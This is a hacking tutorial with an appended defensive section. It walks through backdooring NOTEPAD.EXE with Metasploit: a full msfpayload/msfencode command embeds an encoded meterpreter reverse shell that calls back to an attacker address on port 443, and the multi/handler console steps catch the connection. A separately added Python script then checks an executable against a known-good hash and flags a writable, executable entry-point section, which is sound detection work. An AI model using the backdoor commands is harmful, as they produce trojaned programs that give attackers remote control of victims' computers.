How to Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps
Have you ever imagined that when you click and open your Notepad application, it contains a backdoor or malicious code? Or that when you start your Windows OS, it also starts the explorer.exe service, but this explorer.exe contains a backdoor or malicious code? Actually, embedding a backdoor into an EXE file isn't hard at all; it's very easy. You can follow the tutorial below to see that I'm right, it's easy :p LoL 🙂
1. First of all, prepare your target EXE file. In this case I will use NOTEPAD.EXE.
2. Next, we use msfpayload to inject a meterpreter reverse payload into our executable (NOTEPAD.EXE), encode it 5 times (5 iterations) using shikata_ga_nai, and save the backdoored file to the Desktop (the command below is all on one line).
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
3. Because we selected a reverse meterpreter payload, we need to set up the exploit handler to handle the connection back to our attacking machine. In this case the attacker uses IP address 192.168.8.92. Go to the Metasploit console by typing msfconsole, and then run:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
Don't forget to replace LHOST with your own IP address and LPORT with your desired local port.
PWNED 🙂 You can also learn how to apply this method to attack over the internet, but please read my previous tutorial about the logic of how to attack a network outside the LAN / Attack WAN. I hope you found it useful. Any comments or corrections? Please drop your comment below 🙂
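From the defender's side, the output of step 2 is a copy of a trusted program whose bytes no longer match the vendor's build. The following is an added example, not part of the original tutorial: it compares a file's SHA-256 against a recorded known-good value and flags an entry-point section that is both writable and executable. The sample images, the baseline value and the function names are constructed for illustration, and the writable-code check is a heuristic resting on the assumption that a self-decoding payload needs write access to the memory it runs from.

```python
import hashlib
import struct
MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_* section flags

def parse_pe(data):
    """Return (entry_point_rva, [(name, rva, virtual_size, flags), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]               # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect, opt_size = struct.unpack_from("<H12xH", data, pe + 6)
    entry = struct.unpack_from("<I", data, pe + 40)[0]          # AddressOfEntryPoint
    sections = []
    for i in range(nsect):
        off = pe + 24 + opt_size + 40 * i                       # 40-byte section headers
        name, vsize, rva = struct.unpack_from("<8sII", data, off)
        flags = struct.unpack_from("<I", data, off + 36)[0]     # Characteristics
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), rva, vsize, flags))
    return entry, sections

def audit(data, known_good_sha256):
    """List reasons this file should not be trusted as the vendor's binary."""
    findings = []
    if hashlib.sha256(data).hexdigest() != known_good_sha256:
        findings.append("hash differs from known-good baseline")
    entry, sections = parse_pe(data)
    host = [s for s in sections if s[1] <= entry < s[1] + s[2]]
    if not host:
        findings.append("entry point is outside every section")
    for name, _, _, flags in host:
        if flags & MEM_EXECUTE and flags & MEM_WRITE:
            findings.append(f"entry-point section {name} is writable and executable")
    return findings

def sample_pe(text_flags, body=b"\x90" * 16):
    """Constructed header-only PE32 image with one .text section (not a real program)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H14xI", 0x10B, 0x1000).ljust(224, b"\0")
    sect = struct.pack("<8sIIII12xI", b".text", len(body), 0x1000, len(body), 0x200, text_flags)
    return (dos + b"PE\0\0" + coff + opt + sect).ljust(0x200, b"\0") + body

CLEAN = sample_pe(0x60000020)                    # constructed: code | execute | read
TAMPERED = sample_pe(0xE0000020, b"\xcc" * 16)   # constructed: same, plus write; body changed
BASELINE = hashlib.sha256(CLEAN).hexdigest()     # recorded from the trusted copy

if __name__ == "__main__":
    print(audit(CLEAN, BASELINE), audit(TAMPERED, BASELINE))
```

On a real host the baseline would come from a trusted copy of the program or the vendor's published hash, and Authenticode signature verification is a complementary check.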